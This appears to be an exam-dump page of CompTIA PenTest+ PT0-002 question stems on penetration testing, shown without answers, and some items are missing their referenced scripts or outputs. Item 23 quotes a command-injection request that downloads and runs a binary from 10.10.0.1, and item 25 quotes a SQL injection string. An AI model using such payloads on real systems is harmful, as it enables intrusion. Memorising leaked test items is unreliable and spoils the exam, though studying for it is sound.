Pass the CompTIA PenTest+ PT0-002 Exam with Confidence: The Most Updated PT0-002 Dumps to Success

1. In Python socket programming, SOCK_DGRAM type is:

2. A penetration tester is trying to restrict searches on Google to a specific domain.

Which of the following commands should the penetration tester consider?

3. A consultant just performed a SYN scan of all the open ports on a remote host and now needs to remotely identify the type of services that are running on the host.

Which of the following is an active reconnaissance tool that would be BEST to use to accomplish this task?

4. A penetration tester wants to test a list of common passwords against the SSH daemon on a network device.

Which of the following tools would be BEST to use for this purpose?

5. A customer adds a requirement to the scope of a penetration test that states activities can only occur during normal business hours.

Which of the following BEST describes why this would be necessary?

6. A penetration tester discovers during a recent test that an employee in the accounting department has been making changes to a payment system and redirecting money into a personal bank account. The penetration test was immediately stopped.

Which of the following would be the BEST recommendation to prevent this type of activity in the future?

7. Which of the following protocols or technologies would provide in-transit confidentiality protection for emailing the final security assessment report?

8. CORRECT TEXT

You are a penetration tester running port scans on a server.

INSTRUCTIONS

Part 1: Given the output, construct the command that was used to generate this output from the available options.

Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

9. A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal.

Some of the files that were discovered through this vulnerability are:

Which of the following is the BEST method to help an attacker gain internal access to the affected machine?

10. A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity.

Which of the following is the MOST important action to take before starting this type of assessment?

11. During a penetration test, a tester is able to change values in the URL from example.com/login.php?id=5 to example.com/login.php?id=10 and gain access to a web application.

Which of the following vulnerabilities has the penetration tester exploited?

12. A penetration tester wrote the following script to be used in one engagement:

Which of the following actions will this script perform?

13. A penetration tester who is doing a company-requested assessment would like to send traffic to another system using double tagging.

Which of the following techniques would BEST accomplish this goal?

14. Performing a penetration test against an environment with SCADA devices brings additional safety risk because the:

15. A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository.

After reviewing the code, the tester identifies the following:

Which of the following combinations of tools would the penetration tester use to exploit this script?

16. The following output is from reconnaissance on a public-facing banking website:

Based on these results, which of the following attacks is MOST likely to succeed?

17. A large client wants a penetration tester to scan for devices within its network that are Internet facing. The client is specifically looking for Cisco devices with no authentication requirements.

Which of the following settings in Shodan would meet the client’s requirements?

18. A company has hired a penetration tester to deploy and set up a rogue access point on the network.

Which of the following is the BEST tool to use to accomplish this goal?

19. A penetration tester is cleaning up and covering tracks at the conclusion of a penetration test.

Which of the following should the tester be sure to remove from the system? (Choose two.)

20. A company’s Chief Executive Officer has created a secondary home office and is concerned that the WiFi service being used is vulnerable to an attack. A penetration tester is hired to test the security of the WiFi’s router.

Which of the following is MOST vulnerable to a brute-force attack?

21. A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations.

Which of the following are considered passive reconnaissance tools? (Choose two.)

22. During the reconnaissance phase, a penetration tester obtains the following output:

Reply from 192.168.1.23: bytes=32 time<54ms TTL=128

Reply from 192.168.1.23: bytes=32 time<53ms TTL=128

Reply from 192.168.1.23: bytes=32 time<60ms TTL=128

Reply from 192.168.1.23: bytes=32 time<51ms TTL=128

Which of the following operating systems is MOST likely installed on the host?

23. A penetration tester was able to gain access to a system using an exploit.

The following is a snippet of the code that was utilized:

exploit = “POST ”

exploit += “/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} C

c${IFS}’cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS }apache;${IFS}./apache’%0A%27&loginUser=a&Pwd=a”

exploit += “HTTP/1.1”

Which of the following commands should the penetration tester run post-engagement?

24. A penetration tester found the following valid URL while doing a manual assessment of a web application: http://www.example.com/product.php?id=123987.

Which of the following automated tools would be best to use NEXT to try to identify a vulnerability in this URL?

25. A red team completed an engagement and provided the following example in the report to describe how the team gained access to a web server:

x’ OR role LIKE '%admin%

Which of the following should be recommended to remediate this vulnerability?

26. A penetration tester initiated the transfer of a large data set to verify a proof-of-concept attack as permitted by the ROE. The tester noticed the client's data included PII, which is out of scope, and immediately stopped the transfer.

Which of the following MOST likely explains the penetration tester's decision?

27. A penetration tester has been hired to perform a physical penetration test to gain access to a secure room within a client’s building. Exterior reconnaissance identifies two entrances, a WiFi guest network, and multiple security cameras connected to the Internet.

Which of the following tools or techniques would BEST support additional reconnaissance?

28. A physical penetration tester needs to get inside an organization's office and collect sensitive information without acting suspiciously or being noticed by the security guards. The tester has observed that the company's ticket gate does not scan the badges, and employees leave their badges on the table while going to the restroom.

Which of the following techniques can the tester use to gain physical access to the office? (Choose two.)

29. A penetration tester obtained the following results after scanning a web server using the dirb utility:

...

GENERATED WORDS: 4612

---- Scanning URL: http://10.2.10.13/ ----

+ http://10.2.10.13/about (CODE:200|SIZE:1520)

+ http://10.2.10.13/home.html (CODE:200|SIZE:214)

+ http://10.2.10.13/index.html (CODE:200|SIZE:214)

+ http://10.2.10.13/info (CODE:200|SIZE:214)

...

DOWNLOADED: 4612 C FOUND: 4

Which of the following elements is MOST likely to contain useful information for the penetration tester?

30. During an engagement, a penetration tester found the following list of strings inside a file:

Which of the following is the BEST technique to determine the known plaintext of the strings?

31. A penetration tester was contracted to test a proprietary application for buffer overflow vulnerabilities.

Which of the following tools would be BEST suited for this task?

32. A penetration tester logs in as a user in the cloud environment of a company.

Which of the following Pacu modules will enable the tester to determine the level of access of the existing user?

33. A tester who is performing a penetration test discovers an older firewall that is known to have serious vulnerabilities to remote attacks but is not part of the original list of IP addresses for the engagement.

Which of the following is the BEST option for the tester to take?

34. After gaining access to a previous system, a penetration tester runs an Nmap scan against a network with the following results:

The tester then runs the following command from the previous exploited system, which fails:

Which of the following explains the reason why the command failed?

35. A penetration tester is explaining the MITRE ATT&CK framework to a company’s chief legal counsel.

Which of the following would the tester MOST likely describe as a benefit of the framework?

36. A penetration tester attempted a DNS poisoning attack. After the attempt, no traffic was seen from the target machine.

Which of the following MOST likely caused the attack to fail?

37. Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment?

38. Which of the following is the BEST resource for obtaining payloads against specific network infrastructure products?

39. The results of an Nmap scan are as follows:

Which of the following would be the BEST conclusion about this device?

40. Which of the following describes the reason why a penetration tester would run the command sdelete mimikatz. * on a Windows server that the tester compromised?

41. A final penetration test report has been submitted to the board for review and accepted. The report has three findings rated high.

Which of the following should be the NEXT step?

42. A penetration tester has established an on-path position between a target host and local network services but has not been able to establish an on-path position between the target host and the Internet. Regardless, the tester would like to subtly redirect HTTP connections to a spoofed server IP.

Which of the following methods would BEST support the objective?

43. HOTSPOT

You are a security analyst tasked with hardening a web server.

You have been given a list of HTTP payloads that were flagged as malicious.

INSTRUCTIONS

Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

44. A security analyst needs to perform a scan for SMB port 445 over a/16 network.

Which of the following commands would be the BEST option when stealth is not a concern and the task is time sensitive?

45. Which of the following provides a matrix of common tactics and techniques used by attackers along with recommended mitigations?

46. A penetration tester writes the following script:

Which of the following is the tester performing?

47. Which of the following should a penetration tester attack to gain control of the state in the HTTP protocol after the user is logged in?

48. An Nmap network scan has found five open ports with identified services.

Which of the following tools should a penetration tester use NEXT to determine if any vulnerabilities with associated exploits exist on the open ports?

49. DRAG DROP

You are a penetration tester reviewing a client’s website through a web browser.

INSTRUCTIONS

Review all components of the website through the browser to determine if vulnerabilities are present.

Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

50. A software company has hired a penetration tester to perform a penetration test on a database server. The tester has been given a variety of tools used by the company’s privacy policy.

Which of the following would be the BEST to use to find vulnerabilities on this server?

51. Which of the following documents must be signed between the penetration tester and the client to govern how any provided information is managed before, during, and after the engagement?

52. A penetration tester gives the following command to a systems administrator to execute on one of the target servers:

rm -f /var/www/html/G679h32gYu.php

Which of the following BEST explains why the penetration tester wants this command executed?

53. Which of the following describe the GREATEST concerns about using third-party open-source libraries in application code? (Choose two.)

54. A company that developers embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse- engineering team prior to approval of the subcontract.

Which of the following concerns would BEST support the software company’s request?

55. A penetration tester was able to gather MD5 hashes from a server and crack the hashes easily with rainbow tables.

Which of the following should be included as a recommendation in the remediation report?

56. A penetration tester who is conducting a web-application test discovers a clickjacking vulnerability associated with a login page to financial data.

Which of the following should the tester do with this information to make this a successful exploit?

57. A penetration-testing team is conducting a physical penetration test to gain entry to a building.

Which of the following is the reason why the penetration testers should carry copies of the engagement documents with them?

58. A penetration tester is examining a Class C network to identify active systems quickly.

Which of the following commands should the penetration tester use?

59. A penetration tester ran a ping CA command during an unknown environment test, and it returned a 128 TTL packet.

Which of the following OSs would MOST likely return a packet of this type?

60. A consulting company is completing the ROE during scoping.

Which of the following should be included in the ROE?

61. Which of the following is the MOST effective person to validate results from a penetration test?

62. Which of the following is the MOST important information to have on a penetration testing report that is written for the developers?

63. A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment.

Which of the following could be used for a denial-of-service attack on the network segment?

64. A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good.

Which of the following recommendations should the penetration tester include in the report?

65. A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday.

Which of the following should the security company have acquired BEFORE the start of the assessment?

66. A penetration tester opened a shell on a laptop at a client's office but is unable to pivot because of restrictive ACLs on the wireless subnet. The tester is also aware that all laptop users have a hard-wired connection available at their desks.

Which of the following is the BEST method available to pivot and gain additional access to the network?

67. A penetration tester, who is doing an assessment, discovers an administrator has been exfiltrating proprietary company information. The administrator offers to pay the tester to keep quiet.

Which of the following is the BEST action for the tester to take?

68. A new client hired a penetration-testing company for a month-long contract for various security assessments against the client’s new service. The client is expecting to make the new service publicly available shortly after the assessment is complete and is planning to fix any findings, except for critical issues, after the service is made public. The client wants a simple report structure and does not want to receive daily findings.

Which of the following is most important for the penetration tester to define FIRST?

69. A company that requires minimal disruption to its daily activities needs a penetration tester to perform information gathering around the company’s web presence.

Which of the following would the tester find MOST helpful in the initial information-gathering steps? (Choose two.)

70. A penetration tester is testing a new API for the company's existing services and is preparing the following script:

Which of the following would the test discover?

71. A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important data.

Which of the following was captured by the testing team?

72. A penetration tester wants to perform reconnaissance without being detected.

Which of the following activities have a MINIMAL chance of detection? (Choose two.)

73. Which of the following tools would be BEST suited to perform a manual web application security assessment? (Choose two.)

74. Running a vulnerability scanner on a hybrid network segment that includes general IT servers and industrial control systems:

75. A software company has hired a security consultant to assess the security of the company's software development practices. The consultant opts to begin reconnaissance by performing fuzzing on a software binary.

Which of the following vulnerabilities is the security consultant MOST likely to identify?

76. A penetration tester is testing a new version of a mobile application in a sandbox environment. To intercept and decrypt the traffic between the application and the external API, the tester has created a private root CA and issued a certificate from it. Even though the tester installed the root CA into the trusted stone of the smartphone used for the tests, the application shows an error indicating a certificate mismatch and does not connect to the server.

Which of the following is the MOST likely reason for the error?

77. Which of the following would a company's hunt team be MOST interested in seeing in a final report?

78. A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet.

Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?

79. A penetration tester received a .pcap file to look for credentials to use in an engagement.

Which of the following tools should the tester utilize to open and read the .pcap file?

80. A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client’s IP address. The tester later discovered the SOC had used sinkholing on the penetration tester’s IP address.

Which of the following BEST describes what happened?

81. A security firm has been hired to perform an external penetration test against a company. The only information the firm received was the company name.

Which of the following passive reconnaissance approaches would be MOST likely to yield positive initial results?

82. Which of the following types of assessments MOST likely focuses on vulnerabilities with the objective to access specific data?

83. A penetration tester successfully performed an exploit on a host and was able to hop from VLAN 100 to VLAN 200. VLAN 200 contains servers that perform financial transactions, and the penetration tester now wants the local interface of the attacker machine to have a static ARP entry in the local cache.

The attacker machine has the following:

IP Address: 192.168.1.63

Physical Address: 60-36-dd-a6-c5-33

Which of the following commands would the penetration tester MOST likely use in order to establish a static ARP entry successfully?

84. A penetration tester is scanning a corporate lab network for potentially vulnerable services.

Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?

85. A company recruited a penetration tester to configure wireless IDS over the network.

Which of the following tools would BEST test the effectiveness of the wireless IDS solutions?

86. The following line-numbered Python code snippet is being used in reconnaissance:

Which of the following line numbers from the script MOST likely contributed to the script triggering a “probable port scan” alert in the organization’s IDS?

87. A penetration tester has been given eight business hours to gain access to a client’s financial system.

Which of the following techniques will have the highest likelihood of success?

88. The attacking machine is on the same LAN segment as the target host during an internal penetration test.

Which of the following commands will BEST enable the attacker to

conduct host delivery and write the discovery to files without returning results of the attack machine?

89. A penetration tester exploited a vulnerability on a server and remotely ran a payload to gain a shell. However, a connection was not established, and no errors were shown on the payload execution. The penetration tester suspected that a network device, like an IPS or next-generation firewall, was dropping the connection.

Which of the following payloads are MOST likely to establish a shell successfully?